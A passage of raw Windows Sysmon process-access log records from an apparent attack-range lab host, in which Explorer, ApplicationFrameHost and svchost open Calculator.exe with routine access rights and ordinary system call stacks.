Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+2ce87|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360315Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.702{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+2ce87|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360314Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.702{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+2ce74|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360313Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.702{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+2ce74|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360312Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.702{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+78dd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4 10341000x8000000000000000360311Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.702{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6cfd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4 10341000x8000000000000000360310Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.702{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360309Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.702{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360308Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6c97|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6bab|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f 10341000x8000000000000000360307Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6b1a|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4 10341000x8000000000000000360306Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360305Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360304Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360303Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360302Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360301Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360300Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+78223|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360299Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.pcshell.dll+1aaef|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360298Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360297Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360296Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.686{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360295Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.671{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360294Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.671{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360293Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.671{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360292Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.671{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program 